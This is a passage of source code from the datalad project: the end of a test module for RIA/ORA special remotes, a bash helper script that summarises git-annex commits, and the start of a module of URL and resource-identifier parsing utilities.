\\\n get_layout_locations(1, archiv_store, ds.id)\n ds.export_archive_ora(archive_dir / 'archive.7z')\n init_opts = common_init_opts + ['url={}'.format(arch_url)]\n ds.repo.init_remote('archive', options=init_opts)\n # now fsck the new remote to get the new special remote indexed\n ds.repo.fsck(remote='archive', fast=True)\n assert_equal(len(ds.repo.whereis('one.txt')), len(whereis) + 1)\n # test creating an archive with filters on files\n ds.export_archive_ora(archive_dir / 'archive2.7z', annex_wanted='(include=*.txt)')\n # test with wanted expression of a specific remote\n ds.repo.set_preferred_content(\"wanted\", \"include=subdir/*\", remote=\"store\")\n ds.export_archive_ora(archive_dir / 'archive3.7z', remote=\"store\")\n # test with the current sha\n ds.export_archive_ora(\n archive_dir / 'archive4.7z',\n froms=ds.repo.get_revisions()[1],\n )\n\n\n@slow # 12sec + ? on travis\n# TODO: Skipped due to gh-4436\n@known_failure_windows\n@skip_ssh\ndef test_remote_layout_ssh():\n _test_remote_layout('datalad-test')\n\ndef test_remote_layout():\n _test_remote_layout(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_version_check(host, dspath, store):\n\n dspath = Path(dspath)\n store = Path(store)\n\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n\n create_store(io, store, '1')\n\n # TODO: Re-establish test for version 1\n # version 2: dirhash\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n ds.push('.', to='store')\n\n # check version files\n remote_ds_tree_version_file = store / 'ria-layout-version'\n dsgit_dir, archive_dir, dsobj_dir = \\\n get_layout_locations(1, store, ds.id)\n remote_obj_tree_version_file = dsgit_dir / 'ria-layout-version'\n\n assert_true(remote_ds_tree_version_file.exists())\n assert_true(remote_obj_tree_version_file.exists())\n\n with open(str(remote_ds_tree_version_file), 'r') as f:\n assert_equal(f.read().strip(), '1')\n with open(str(remote_obj_tree_version_file), 'r') as f:\n assert_equal(f.read().strip(), '2')\n\n # Accessing the remote should not yield any output regarding versioning,\n # since it's the \"correct\" version. Note that \"fsck\" is an arbitrary choice.\n # We need just something to talk to the special remote.\n with swallow_logs(new_level=logging.INFO) as cml:\n ds.repo.fsck(remote='store', fast=True)\n # TODO: For some reason didn't get cml.assert_logged to assert\n # \"nothing was logged\"\n assert not cml.out\n\n # Now fake-change the version\n with open(str(remote_obj_tree_version_file), 'w') as f:\n f.write('X\\n')\n\n # Now we should see a message about it\n with swallow_logs(new_level=logging.INFO) as cml:\n ds.repo.fsck(remote='store', fast=True)\n cml.assert_logged(level=\"INFO\",\n msg=\"Remote object tree reports version X\",\n regex=False)\n\n # reading still works:\n ds.drop('.')\n assert_status('ok', ds.get('.'))\n\n # but writing doesn't:\n with open(str(Path(ds.path) / 'new_file'), 'w') as f:\n f.write(\"arbitrary addition\")\n ds.save(message=\"Add a new_file\")\n\n with assert_raises((CommandError, IncompleteResultsError)):\n ds.push('new_file', to='store')\n\n # However, we can force it by configuration\n ds.config.add(\"annex.ora-remote.store.force-write\", \"true\", scope='local')\n ds.push('new_file', to='store')\n\n\n@slow # 17sec + ? on travis\n@skip_ssh\n@known_failure_windows\ndef test_version_check_ssh():\n # TODO: Skipped due to gh-4436\n _test_version_check('datalad-test')\n\n\ndef test_version_check():\n _test_version_check(None)\n\n\n# git-annex-testremote is way too slow on crippled FS.\n# Use is_managed_branch() as a proxy and skip only here\n# instead of in a decorator\n@skip_if_adjusted_branch\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_gitannex(host, store, dspath):\n store = Path(store)\n\n dspath = Path(dspath)\n store = Path(store)\n\n ds = Dataset(dspath).create()\n\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n\n create_store(io, store, '1')\n\n # TODO: Re-establish test for version 1\n # version 2: dirhash\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n from datalad.support.external_versions import external_versions\n if '8.20200330' < external_versions['cmd:annex'] < '8.20200624':\n # https://git-annex.branchable.com/bugs/testremote_breeds_way_too_many_instances_of_the_externals_remote/?updated\n raise SkipTest(\n \"git-annex might lead to overwhelming number of external \"\n \"special remote instances\")\n\n # run git-annex-testremote\n # note, that we don't want to capture output. If something goes wrong we\n # want to see it in test build's output log.\n ds.repo._call_annex(['testremote', 'store'], protocol=NoCapture)\n\n\n@turtle\n@known_failure_windows # TODO: Skipped due to gh-4436\n@skip_ssh\ndef test_gitannex_ssh():\n _test_gitannex('datalad-test')\n\n\n@slow # 41sec on travis\ndef test_gitannex_local():\n _test_gitannex(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_binary_data(host, store, dspath):\n # make sure, special remote deals with binary data and doesn't\n # accidentally involve any decode/encode etc.\n\n dspath = Path(dspath)\n store = Path(store)\n\n url = \"https://github.com/datalad/example-dicom-functional/blob/master/dicoms/MR.1.3.46.670589.11.38317.5.0.4476.2014042516042547586\"\n file = \"dicomfile\"\n ds = Dataset(dspath).create()\n ds.download_url(url, path=file, message=\"Add DICOM file from github\")\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n\n create_store(io, store, '1')\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n # actual data transfer (both directions)\n # Note, that we intentionally call annex commands instead of\n # datalad-publish/-get here. We are testing an annex-special-remote.\n\n store_uuid = ds.siblings(name='store',\n return_type='item-or-list')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list')['annex-uuid']\n\n known_sources = ds.repo.whereis(str(file))\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n ds.repo.call_annex(['move', str(file), '--to', 'store'])\n known_sources = ds.repo.whereis(str(file))\n assert_not_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n ds.repo.call_annex(['get', str(file), '--from', 'store'])\n known_sources = ds.repo.whereis(str(file))\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n\n\ndef test_binary_data():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_binary_data))('datalad-test')\n skip_if_no_network(_test_binary_data)(None)\n\n\n@known_failure_windows\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_push_url(storepath=None, dspath=None, blockfile=None):\n\n dspath = Path(dspath)\n store = Path(storepath)\n blockfile = Path(blockfile)\n blockfile.touch()\n\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n repo = ds.repo\n\n # set up store:\n io = LocalIO()\n store_url = \"ria+{}\".format(store.as_uri())\n create_store(io, store, '1')\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # initremote fails with invalid url (not a ria+ URL):\n invalid_url = (store.parent / \"non-existent\").as_uri()\n init_opts = common_init_opts + ['url={}'.format(store_url),\n 'push-url={}'.format(invalid_url)]\n assert_raises(CommandError, ds.repo.init_remote, 'store', options=init_opts)\n\n # initremote succeeds with valid but inaccessible URL (pointing to a file\n # instead of a store):\n block_url = \"ria+\" + blockfile.as_uri()\n init_opts = common_init_opts + ['url={}'.format(store_url),\n 'push-url={}'.format(block_url)]\n repo.init_remote('store', options=init_opts)\n\n store_uuid = ds.siblings(name='store',\n return_type='item-or-list')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list')['annex-uuid']\n\n # but a push will fail:\n assert_raises(CommandError, ds.repo.call_annex,\n ['copy', 'one.txt', '--to', 'store'])\n\n # reconfigure w/ local overwrite:\n repo.config.add(\"remote.store.ora-push-url\", store_url, scope='local')\n # push works now:\n repo.call_annex(['copy', 'one.txt', '--to', 'store'])\n\n # remove again (config and file from store)\n repo.call_annex(['move', 'one.txt', '--from', 'store'])\n repo.config.unset(\"remote.store.ora-push-url\", scope='local')\n repo.call_annex(['fsck', '-f', 'store'])\n known_sources = repo.whereis('one.txt')\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n\n # reconfigure (this time committed)\n init_opts = common_init_opts + ['url={}'.format(store_url),\n 'push-url={}'.format(store_url)]\n repo.enable_remote('store', options=init_opts)\n\n # push works now:\n repo.call_annex(['copy', 'one.txt', '--to', 'store'])\n known_sources = repo.whereis('one.txt')\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n\n\n# create-sibling-ria cannot handle windows paths\n@known_failure_windows\n@with_tempfile\n@with_tempfile\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_url_keys(dspath=None, storepath=None, httppath=None, httpurl=None):\n ds = Dataset(dspath).create()\n repo = ds.repo\n filename = 'url_no_size.html'\n # URL-type key without size\n repo.call_annex([\n 'addurl', '--relaxed', '--raw', '--file', filename, httpurl,\n ])\n ds.save()\n # copy target\n ds.create_sibling_ria(\n name='ria',\n url='ria+file://{}'.format(storepath),\n storage_sibling='only',\n new_store_ok=True\n )\n ds.get(filename)\n repo.call_annex(['copy', '--to', 'ria', filename])\n ds.drop(filename)\n # in the store and on the web\n assert_equal(len(ds.repo.whereis(filename)), 2)\n # try download, but needs special permissions to even be attempted\n ds.config.set('annex.security.allow-unverified-downloads', 'ACKTHPPT', scope='local')\n repo.call_annex(['copy', '--from', 'ria', filename])\n assert_equal(len(ds.repo.whereis(filename)), 3)\n # smoke tests that execute the remaining pieces with the URL key\n repo.call_annex(['fsck', '-f', 'ria'])\n assert_equal(len(ds.repo.whereis(filename)), 3)\n # mapped key in whereis output\n assert_in('127.0.0.1', repo.call_annex(['whereis', filename]))\n\n repo.call_annex(['move', '-f', 'ria', filename])\n # check that it does not magically reappear, because it actually\n # did not drop the file\n repo.call_annex(['fsck', '-f', 'ria'])\n assert_equal(len(ds.repo.whereis(filename)), 2)\n\n\ndef test_sanitize_key():\n for i, o in (\n ('http://example.com/', 'http&c%%example.com%'),\n ('/%&:', '%&s&a&c'),\n ):\n assert_equal(_sanitize_key(i), o)\n\n\n# Skipping on adjusted branch as a proxy for crippledFS. Write permissions of\n# the owner on a directory can't be revoked on VFAT. \"adjusted branch\" is a\n# bit broad but covers the CI cases. And everything RIA/ORA doesn't currently\n# properly run on crippled/windows anyway. Needs to be more precise when\n# RF'ing will hopefully lead to support on windows in principle.\n@skip_if_adjusted_branch\n@known_failure_windows\n@with_tempfile\n@with_tempfile\ndef _test_permission(host, storepath, dspath):\n\n # Test whether ORA correctly revokes and obtains write permissions within\n # the annex object tree. That is: Revoke after ORA pushed a key to store\n # in order to allow the object tree to safely be used with an ephemeral\n # clone. And on removal obtain write permissions, like annex would\n # internally on a drop (but be sure to restore if something went wrong).\n\n dspath = Path(dspath)\n storepath = Path(storepath)\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n ds.save()\n assert_repo_status(ds.path)\n testfile = 'one.txt'\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=storepath)\n else:\n store_url = \"ria+{}\".format(storepath.as_uri())\n\n create_store(io, storepath, '1')\n create_ds_in_store(io, storepath, ds.id, '2', '1')\n _, _, obj_tree = get_layout_locations(1, storepath, ds.id)\n assert_true(obj_tree.is_dir())\n file_key_in_store = obj_tree / 'X9' / '6J' / 'MD5E-s8--7e55db001d319a94b0b713529a756623.txt' / 'MD5E-s8--7e55db001d319a94b0b713529a756623.txt'\n\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n store_uuid = ds.siblings(name='store',\n return_type='item-or-list')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list')['annex-uuid']\n\n known_sources = ds.repo.whereis(testfile)\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n assert_false(file_key_in_store.exists())\n\n ds.repo.call_annex(['copy', testfile, '--to', 'store'])\n known_sources = ds.repo.whereis(testfile)\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n assert_true(file_key_in_store.exists())\n\n # Revoke write permissions from parent dir in-store to test whether we\n # still can drop (if we can obtain the permissions). Note, that this has\n # no effect on VFAT.\n file_key_in_store.parent.chmod(file_key_in_store.parent.stat().st_mode &\n ~stat.S_IWUSR)\n # we can't directly delete; key in store should be protected\n assert_raises(PermissionError, file_key_in_store.unlink)\n\n # ORA can still drop, since it obtains permission to:\n ds.repo.call_annex(['drop', testfile, '--from', 'store'])\n known_sources = ds.repo.whereis(testfile)\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n assert_false(file_key_in_store.exists())\n\n\n@skip_ssh\ndef test_obtain_permission_ssh():\n _test_permission('datalad-test')\n\n@skip_if_root\ndef test_obtain_permission_root():\n _test_permission(None)\n" }, { "alpha_fraction": 0.6206554174423218, "alphanum_fraction": 0.6325719952583313, "avg_line_length": 22.9761905670166, "blob_id": "1d16ab6d77a4b7e6ef38fbf9515a6d3e754ca4d8", "content_id": "77a1b18def1f9ac8edb20633fe1107435d9b9bf4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1007, "license_type": "permissive", "max_line_length": 118, "num_lines": 42, "path": "/tools/describegitannex", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncommit=\"$1\"\n\n: ${GIT_ANNEX_SRCPATH:=~/proj/git-annex}\n: ${GIT_ANNEX_USER:=yarikoptic}\n\nfunction indent() {\n\tsed -e 's,^, ,g'\n}\n\nfunction pull() {\n\techo \"I: pull --rebase\"\n\tgit pull --rebase 2>&1 | indent\n}\n\nset -eu\nbuiltin cd \"$GIT_ANNEX_SRCPATH\"\n\nif [[ -z \"$commit\" ]]; then\n\tpull\n\techo \"I: Differences from Joey:\"\n\tgit diff origin/master.. 2>&1 | indent\n\t# life is too short to discover correct way\n\tcommit=$(git show | head -n1 | awk '{print $2;}')\nfi\n\necho \"I: Head of the last commit:\"\n{ git show \"$commit\" | head -n 10 || { echo \"not found; fetching\"; pull; git show \"$commit\" | head -n 10; } } | indent\n\ndesc=$(git describe \"$commit\")\ndesc_contains=$(git describe --contains \"$commit\" 2>/dev/null || echo '')\n\nif [[ ! -z \"$desc_contains\" ]]; then\n\tdesc_contains=\" AKA $desc_contains\"\nfi\n\nmd=\"[$desc$desc_contains](https://git.kitenet.net/index.cgi/git-annex.git/commit/?id=$commit)\"\necho\necho \"I: Markdown links to the commit\"\necho \" $md\"\necho \" > fixed in $md --[[$GIT_ANNEX_USER]]\"\n" }, { "alpha_fraction": 0.5896903872489929, "alphanum_fraction": 0.593467652797699, "avg_line_length": 32.310855865478516, "blob_id": "6cc783903d3ad1266472dd1121252a7b14e3b0ff", "content_id": "77db0b9fb3bf2db0caf053d7c5c42300ae158e09", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40506, "license_type": "permissive", "max_line_length": 116, "num_lines": 1216, "path": "/datalad/support/network.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\nfrom __future__ import annotations\n\nimport logging\n\nlgr = logging.getLogger('datalad.network')\n\nlgr.log(5, \"Importing support.network\")\nimport calendar\nimport email.utils\nimport os\nimport pickle\nimport re\nimport time\nfrom hashlib import md5\nfrom ntpath import splitdrive as win_splitdrive\nfrom os.path import dirname\nfrom os.path import join as opj\nfrom pathlib import PurePosixPath\nfrom urllib.error import URLError\nfrom urllib.parse import (\n ParseResult,\n parse_qsl,\n)\nfrom urllib.parse import quote as urlquote\nfrom urllib.parse import unquote as urlunquote\nfrom urllib.parse import (\n quote,\n urlencode,\n urljoin,\n urlparse,\n urlsplit,\n urlunparse,\n)\nfrom urllib.request import (\n Request,\n url2pathname,\n)\n\nimport iso8601\n\nfrom datalad import (\n cfg,\n consts,\n)\nfrom datalad.support.cache import lru_cache\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.utils import (\n Path,\n PurePath,\n ensure_bytes,\n ensure_dir,\n ensure_unicode,\n map_items,\n on_windows,\n)\n\n# !!! Lazily import requests where needed -- needs 30ms or so\n# import requests\n\n\ndef local_path_representation(path: str) -> str:\n \"\"\"Return an OS-specific representation of a Posix-style path\n\n With a posix path in the form of \"a/b\" this function will return \"a/b\" on\n Unix-like operating systems and \"a\\\\b\" on Windows-style operating systems.\n \"\"\"\n return str(Path(path))\n\n\ndef local_url_path_representation(url_path: str) -> str:\n \"\"\"Return an OS-specific representation of the path component in a file:-URL\n\n With a path component like \"/c:/Windows\" (i.e. from a URL that reads\n \"file:///c:/Windows\"), this function will return \"/c:/Windows\" on a\n Unix-like operating systems and \"C:\\\\Windows\" on Windows-like operating\n systems.\n \"\"\"\n return url2pathname(quote(url_path))\n\n\ndef local_path_from_url(url: str) -> str:\n \"\"\"Parse the url and extract an OS-specific local path representation\"\"\"\n return local_url_path_representation(urlparse(url).path)\n\n\ndef is_windows_path(path):\n win_split = win_splitdrive(path)\n # Note, that ntpath.splitdrive also deals with UNC paths. In that case\n # the \"drive\" wouldn't be a windows drive letter followed by a colon\n if win_split[0] and win_split[1] and \\\n win_split[0].endswith(\":\") and len(win_split[0]) == 2:\n # seems to be a windows path\n return True\n return False\n\n\ndef get_response_disposition_filename(s):\n \"\"\"Given a string s as from HTTP Content-Disposition field in the response\n return possibly present filename if any\n \"\"\"\n if not s:\n return None\n # If the response has Content-Disposition, try to get filename from it\n cd = map(\n lambda x: x.strip().split('=', 1) if '=' in x else [x.strip(), ''],\n s.split(';')\n )\n # unify the key to be lower case and make it into a dict\n cd = dict([[x[0].lower()] + x[1:] for x in cd])\n if 'filename' in cd:\n filename = cd['filename'].strip(\"\\\"'\")\n return filename\n return None\n\n\ndef get_url_disposition_filename(url, headers=None):\n \"\"\"Get filename as possibly provided by the server in Content-Disposition\n \"\"\"\n if headers is None:\n request = Request(url)\n r = retry_urlopen(request)\n # things are different in requests\n if 'requests.' in str(r.__class__):\n headers = r.headers\n else:\n headers = r.info()\n else:\n r = None\n try:\n return get_response_disposition_filename(headers.get('Content-Disposition', ''))\n finally:\n if r:\n r.close()\n\n\ndef get_url_straight_filename(url, strip=None, allowdir=False):\n \"\"\"Get file/dir name of the last path component of the URL\n\n Parameters\n ----------\n strip: list, optional\n If provided, listed names will not be considered and their\n parent directory will be selected\n allowdir: bool, optional\n If url points to a \"directory\" (ends with /), empty string\n would be returned unless allowdir is True, in which case the\n name of the directory would be returned\n \"\"\"\n path = urlunquote(urlsplit(url).path)\n path_parts = path.split('/')\n\n if allowdir:\n # strip empty ones\n while len(path_parts) > 1 and not path_parts[-1]:\n path_parts = path_parts[:-1]\n\n if strip:\n while path_parts and path_parts[-1] in strip:\n path_parts = path_parts[:-1]\n\n if path_parts:\n return path_parts[-1]\n else:\n return None\n\n\ndef get_url_filename(url, headers=None, strip=None):\n \"\"\"Get filename from the url, first consulting server about Content-Disposition\n \"\"\"\n filename = get_url_disposition_filename(url, headers)\n if filename:\n return filename\n return get_url_straight_filename(url, strip=strip)\n\n\ndef get_url_response_stamp(url, response_info):\n size, mtime = None, None\n if 'Content-length' in response_info:\n size = int(response_info['Content-length'])\n if 'Last-modified' in response_info:\n mtime = calendar.timegm(email.utils.parsedate(\n response_info['Last-modified']))\n return dict(size=size, mtime=mtime, url=url)\n\n\ndef get_tld(url):\n \"\"\"Return top level domain from a url\n\n Parameters\n ----------\n url : str\n \"\"\"\n # maybe use this instead to be safe: https://pypi.python.org/pypi/tld\n if not url.strip():\n raise ValueError(\"Empty URL has no TLD\")\n rec = urlsplit(url)\n if not rec.netloc:\n if not rec.scheme:\n # There were no scheme provided thus netloc was empty -- must have been a simple 'path like'\n return url.split('/', 1)[0]\n else:\n raise ValueError(\"It seems that only the scheme was provided without the net location/TLD\")\n return rec.netloc\n\n\nfrom email.utils import (\n mktime_tz,\n parsedate_tz,\n)\n\n\ndef rfc2822_to_epoch(datestr):\n \"\"\"Given rfc2822 date/time format, return seconds since epoch\"\"\"\n return mktime_tz(parsedate_tz(datestr))\n\n\ndef iso8601_to_epoch(datestr):\n \"\"\"Given ISO 8601 date/time format, return in seconds since epoch\n\n iso8601 is used to parse properly the time zone information, which\n can't be parsed with standard datetime strptime\n \"\"\"\n return calendar.timegm(iso8601.parse_date(datestr).utctimetuple())\n\n\ndef __urlopen_requests(url):\n # XXX Workaround for now for ... broken code\n if isinstance(url, Request):\n url = url.get_full_url()\n from requests import Session\n return Session().get(url, stream=True)\n\n\ndef retry_urlopen(url, retries=3):\n for t in range(retries):\n try:\n return __urlopen_requests(url)\n except URLError as e:\n lgr.warning(\"Received exception while reading %s: %s\" % (url, e))\n if t == retries - 1:\n # if we have reached allowed number of retries -- reraise\n raise\n\n\ndef is_url_quoted(url):\n \"\"\"Return whether URL looks being already quoted\n \"\"\"\n try:\n url_ = urlunquote(url)\n return url != url_\n except: # problem with unquoting -- then it must be wasn't quoted (correctly)\n # MIH: ValueError?\n return False\n\n\ndef same_website(url_rec, u_rec):\n \"\"\"Decide whether a link leads to external site\n\n Parameters\n ----------\n url_rec: ParseResult\n record for original url\n u_rec: ParseResult\n record for new url\n \"\"\"\n if isinstance(url_rec, str):\n url_rec = urlparse(url_rec)\n if isinstance(u_rec, str):\n u_rec = urlparse(u_rec)\n return (url_rec.netloc == u_rec.netloc)\n # todo: collect more of sample cases.\n # disabled below check while working on ratholeradio, since links\n # could go to the parent and that is ok. Figure out when it was\n # desired not to go to the parent -- we might need explicit option\n # and u_rec.path.startswith(url_rec.path)):\n\n\ndef dlurljoin(u_path, url):\n url_rec = urlparse(url) # probably duplicating parsing :-/ TODO\n if url_rec.scheme:\n # independent full url, so just return it\n return url\n if u_path.endswith('/'): # should here be also a scheme use?\n if url.startswith('/'): # jump to the root\n u_path_rec = urlparse(u_path)\n return urljoin(urlunparse(\n (u_path_rec.scheme, u_path_rec.netloc, '', '', '', '')), url)\n else:\n return os.path.join(u_path, url)\n # TODO: recall where all this dirname came from and bring into the test\n return urljoin(os.path.dirname(u_path) + '/', url)\n\n\n# TODO should it be a node maybe?\nclass SimpleURLStamper(object):\n \"\"\"Gets a simple stamp about the URL: {url, time, size} of whatever was provided in the header\n \"\"\"\n def __init__(self, mode='full'):\n self.mode = mode\n\n def __call__(self, url):\n # Extracted from above madness\n # TODO: add mode alike to 'relaxed' where we would not\n # care about content-disposition filename\n # http://stackoverflow.com/questions/862173/how-to-download-a-file-using-python-in-a-smarter-way\n request = Request(url)\n\n # No traffic compression since we do not know how to identify\n # exactly either it has to be decompressed\n # request.add_header('Accept-encoding', 'gzip,deflate')\n #\n # TODO: think about stamping etc -- we seems to be redoing\n # what git-annex does for us already... not really\n r = retry_urlopen(request)\n try:\n r_info = r.info()\n r_stamp = get_url_response_stamp(url, r_info)\n\n return dict(mtime=r_stamp['mtime'], size=r_stamp['size'], url=url)\n finally:\n r.close()\n\n\n# TODO: make it consistent/clear at what stage % encoding/decoding happens!\n# now it is a mix!\n\n#\n# Useful functionality in requests.models\n# utils.requote_uri -- quote/unquote cycle to guarantee consistent appearance\n# RequestEncodingMixin._encode_params -- Will successfully encode parameters when passed as a dict or a list of ...\n# PreparedRequest().prepare_url(url, params) -- nicely cares about url encodings etc\n#\n\n@lru_cache(maxsize=100)\ndef _guess_ri_cls(ri):\n \"\"\"Factory function which would determine which type of a ri a provided string is\"\"\"\n TYPES = {\n 'url': URL,\n 'ssh': SSHRI,\n 'file': PathRI,\n 'datalad': DataLadRI,\n 'git-transport': GitTransportRI,\n }\n if isinstance(ri, PurePath):\n lgr.log(5, \"Detected file ri\")\n return TYPES['file']\n if is_windows_path(ri):\n # OMG we got something from windows\n lgr.log(5, \"Detected file ri\")\n return TYPES['file']\n\n # We assume that it is a URL and parse it. Depending on the result\n # we might decide that it was something else ;)\n fields = URL._pr_to_fields(urlparse(ri), guessing=True)\n lgr.log(5, \"Parsed ri %s into fields %s\", ri, fields)\n type_ = 'url'\n # Special treatments\n # file:///path should stay file:\n if fields['scheme'] and fields['scheme'] not in {'file'} \\\n and not fields['hostname']:\n # transport::URL-or-path\n if fields['path'].startswith(':'): # there was ::\n lgr.log(5, \"Assuming git transport style ri and returning\")\n type_ = 'git-transport'\n # dl+archive:... or just for ssh hostname:path/p1\n elif '+' not in fields['scheme']:\n type_ = 'ssh'\n lgr.log(5, \"Assuming ssh style ri, adjusted: %s\", fields)\n\n if not fields['scheme'] and not fields['hostname']:\n parts = _split_colon(ri)\n # if no illegal for username@hostname characters in the first part and\n # we either had username@hostname or multiple :-separated parts\n if not set(parts[0]).intersection(set('/\\\\#')) and (\n fields['path'] and\n '@' in fields['path'] or\n len(parts) > 1\n ):\n # user@host:path/sp1\n # or host_name: (hence parts check)\n # TODO: we need a regex to catch those really, parts check is not suff\n type_ = 'ssh'\n elif ri.startswith('//'):\n # e.g. // or ///path\n type_ = 'datalad'\n else:\n type_ = 'file'\n\n if not fields['scheme'] and fields['hostname']:\n # e.g. //a/path\n type_ = 'datalad'\n\n cls = TYPES[type_]\n # just parse the ri according to regex matchint ssh \"ri\" specs\n lgr.log(5, \"Detected %s ri\", type_)\n return cls\n\n\nclass RI(object):\n \"\"\"Resource Identifier - base class and a factory for URL, SSHRI, etc\n\n Intended to be a R/O object (i.e. no fields should be changed in-place).\n Subclasses define specific collections of fields they care about in _FIELDS\n class variable.\n The idea is that this class should help to break apart a URL, while being\n able to rebuild itself into a string representation for reuse\n\n `RI` could be used as factory, whenever type of the resource is unknown and\n must be guessed from the string representation. One of the subclasses will be\n provided as output, e.g.\n\n >>> RI('http://example.com')\n URL(hostname='example.com', netloc='example.com', scheme='http')\n >>> RI('file://C:/Windows')\n URL(hostname='c', netloc='C:', path='/Windows', scheme='file')\n >>> RI('example.com:path')\n SSHRI(hostname='example.com', path='path')\n \"\"\"\n\n # All of the subclasses will provide path\n _FIELDS = (\n 'path',\n )\n\n __slots__ = _FIELDS + ('_fields', '_str')\n\n def __new__(cls, ri=None, **kwargs):\n \"\"\"Used as a possible factory for known RI types\n\n Returns\n -------\n RI\n uninitialized RI object of appropriate class with _str\n set to string representation if was provided\n\n Raises\n ------\n ValueError\n Whenever the RI type cannot be determined.\n \"\"\"\n if cls is RI and ri is not None:\n # RI class was used as a factory\n try:\n cls = _guess_ri_cls(ri)\n except Exception as e:\n # when anything goes wrong here, ensure a homogeneous\n # exception with a regular error\n raise ValueError(\n f\"Could not determine resource identifier type for {ri!r}\"\n ) from e\n\n if cls is RI:\n raise ValueError(\n f\"Could not determine resource identifier type for {ri!r}\")\n\n ri_obj = super(RI, cls).__new__(cls)\n # Store internally original str\n ri_obj._str = str(ri) if isinstance(ri, PurePath) else ri\n return ri_obj\n\n def __init__(self, ri=None, **fields):\n \"\"\"\n Parameters\n ----------\n ri: str, optional\n String version of a resource specific for this class. If you would like\n a type of the resource be deduced, use RI(ri). Note that this value\n will be passed to str(), so you do not have to cast it yourself.\n **fields: dict, optional\n The values for the fields defined in _FIELDS class variable.\n \"\"\"\n if ri and (bool(ri) == bool(fields)):\n raise ValueError(\n \"Specify either ri or breakdown from the fields, not both. \"\n \"Got ri=%r, fields=%r\" % (ri, fields))\n\n self._fields = self._get_blank_fields()\n if ri is not None:\n ri = str(ri)\n fields = self._str_to_fields(ri)\n self._set_from_fields(**fields)\n\n # If was initialized from a string representation\n if lgr.isEnabledFor(logging.DEBUG) and self._str is not None:\n # well -- some ris might not unparse identically back\n # strictly speaking, but let's assume they do\n ri_ = self.as_str()\n if ri != ri_:\n lgr.debug(\"Parsed version of %s %r differs from original %r\",\n self.__class__.__name__, ri_, ri)\n\n @classmethod\n def _get_blank_fields(cls, **fields):\n return dict(((f, fields.get(f, '')) for f in cls._FIELDS))\n\n @property\n def fields(self):\n \"\"\"Returns shallow copy of fields to ease manipulations\"\"\"\n return self._fields.copy()\n\n def __repr__(self):\n # since auto_repr doesn't support \"non-0\" values atm\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \", \".join([\"%s=%r\" % (k, v)\n for k, v in sorted(self._fields.items())\n if v]))\n\n # Lazily evaluated if _str was not set\n def __str__(self):\n if self._str is None:\n self._str = self.as_str()\n return self._str\n\n @classmethod\n def from_str(cls, ri_str):\n obj = cls(**cls._str_to_fields(ri_str))\n obj._str = ri_str\n return obj\n\n @property\n def localpath(self):\n # by default RIs point to remote locations\n raise ValueError(\"%s points to remote location\" % self)\n\n # Apparently doesn't quite play nicely with multiple inheritance for MixIn'\n # of regexp based URLs\n #@abstractmethod\n #@classmethod\n #def _str_to_fields(cls, ri_str):\n # raise NotImplementedError\n\n 